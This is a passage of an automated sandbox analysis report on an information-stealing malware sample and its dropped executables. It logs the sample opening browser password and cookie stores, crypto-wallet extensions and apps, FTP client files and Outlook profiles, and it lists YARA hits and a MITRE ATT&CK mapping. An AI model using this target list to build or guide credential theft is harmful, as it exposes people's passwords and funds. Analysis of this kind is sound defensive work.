Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shmJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journalJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFL
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFL
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWT
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWT
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWT
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWT
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDB
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDB
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIU
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIU
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                          Source: Yara matchFile source: 00000000.00000002.2727922118.0000000000B74000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000003.3341908004.000000000149C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000003.3362083750.00000000014A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000003.3314391568.000000000149C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000003.3314921050.000000000149F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000003.3360346452.000000000149F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000003.3316698804.000000000149F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7276, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: fc1511c233.exe PID: 3636, type: MEMORYSTR

                          Remote Access Functionality

                          Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                          Source: Yara match File source: Process Memory Space: 1b3b76c439.exe PID: 7712, type: MEMORYSTR
                          Source: Yara match File source: Process Memory Space: fc1511c233.exe PID: 3636, type: MEMORYSTR
                          Source: Yara match File source: sslproxydump.pcap, type: PCAP
                          Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                          Source: Yara match File source: 0000001C.00000002.3259318138.00000000008B1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                          Source: Yara match File source: 00000030.00000003.3348999903.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000000.00000002.2727922118.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match File source: 0000001C.00000002.3262194656.000000000140E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 0000001C.00000003.3200675680.0000000005280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000000.00000003.2156119488.0000000005320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000000.00000002.2729388458.000000000155E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: file.exe PID: 7276, type: MEMORYSTR
                          Source: Yara match File source: Process Memory Space: 6ae2430bb1.exe PID: 5396, type: MEMORYSTR
                          Source: Yara match File source: Process Memory Space: 6ae2430bb1.exe PID: 6464, type: MEMORYSTR
                          Source: Yara match File source: dump.pcap, type: PCAP
                          Source: Yara match File source: Process Memory Space: file.exe PID: 7276, type: MEMORYSTR
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB60C40 sqlite3_bind_zeroblob,0_2_6CB60C40
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB60D60 sqlite3_bind_parameter_name,0_2_6CB60D60
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA88EA0 sqlite3_clear_bindings,0_2_6CA88EA0
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB60B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,0_2_6CB60B40
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA86410 bind,WSAGetLastError,0_2_6CA86410
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA860B0 listen,WSAGetLastError,0_2_6CA860B0
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA8C030 sqlite3_bind_parameter_count,0_2_6CA8C030
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA86070 PR_Listen,0_2_6CA86070
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA8C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,0_2_6CA8C050
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA122D0 sqlite3_bind_blob,0_2_6CA122D0
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA863C0 PR_Bind,0_2_6CA863C0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 22_2_008AEC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,22_2_008AEC48
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 22_2_008ADF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,22_2_008ADF51
                          Mitre Att&ck Matrix, rebuilt from the flattened grid as one line per tactic (a number in parentheses is the signature count the report shows for that technique):

                          Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                          Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                          Execution: Native API (11); Command and Scripting Interpreter (2); Scheduled Task/Job (1); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                          Persistence: DLL Side-Loading (1); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (11); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                          Privilege Escalation: DLL Side-Loading (1); Extra Window Memory Injection (1); Process Injection (12); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (11); RC Scripts; Startup Items; Scheduled Task/Job; At
                          Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (4); Software Packing (12); DLL Side-Loading (1); Extra Window Memory Injection (1); Masquerading (11); Virtualization/Sandbox Evasion (341); Process Injection (12)
                          Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                          Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (12); System Information Discovery (238); Query Registry (1); Security Software Discovery (861); Process Discovery (2); Virtualization/Sandbox Evasion (341); System Owner/User Discovery (1)
                          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                          Collection: Archive Collected Data (1); Data from Local System (41); Email Collection (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                          Command and Control: Ingress Tool Transfer (12); Encrypted Channel (21); Remote Access Software (1); Non-Application Layer Protocol (3); Application Layer Protocol (114); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                          Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1568907, Sample: file.exe, Startdate: 05/12/2024, Architecture: WINDOWS, Score: 100). The rendered graph of the process tree with its contacted IPs/domains, dropped files and triggered signatures per process is not reproduced in this text extraction.
